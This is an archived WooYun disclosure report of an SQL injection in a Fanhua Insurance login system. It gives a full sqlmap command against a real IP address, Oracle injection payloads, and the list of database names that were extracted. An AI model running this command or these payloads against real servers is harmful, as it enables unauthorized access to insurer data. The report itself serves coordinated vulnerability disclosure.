乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-18: 细节已通知厂商并且等待厂商处理中 2016-04-20: 厂商已经确认,细节仅向厂商公开 2016-04-30: 细节向核心白帽子及相关领域专家公开 2016-05-10: 细节向普通白帽子公开 2016-05-20: 细节向实习白帽子公开 2016-06-04: 细节向公众公开
泛华保险某系统存在SQL注入漏洞
存在漏洞服务器http://219.141.188.35/biportal
python sqlmap.py -u "http://219.141.188.35/biportal/verifyLogin" --data "systemValidType=cognosLogin&userCode=test&actionType=login&userPassword=123456" -p userCode --dbms 'Oracle'
---Parameter: userCode (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: systemValidType=cognosLogin&userCode=test' AND 9278=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(118)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9278=9278) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'KhpS'='KhpS&actionType=login&userPassword=123456 Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: systemValidType=cognosLogin&userCode=test' UNION ALL SELECT NULL,CHR(113)||CHR(113)||CHR(118)||CHR(122)||CHR(113)||CHR(66)||CHR(104)||CHR(108)||CHR(117)||CHR(89)||CHR(69)||CHR(122)||CHR(116)||CHR(66)||CHR(72)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113) FROM DUAL-- &actionType=login&userPassword=123456 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: systemValidType=cognosLogin&userCode=test' AND 3861=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'QCVT'='QCVT&actionType=login&userPassword=123456
available databases [20]: [*] BIPORTAL[*] COGNOS[*] COGNOS1[*] CTXSYS[*] DBSNMP[*] DMSYS[*] DW[*] EXFSYS[*] MDSYS[*] ODS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
过滤
危害等级:中
漏洞Rank:10
确认时间:2016-04-20 15:13
非常感谢!
暂无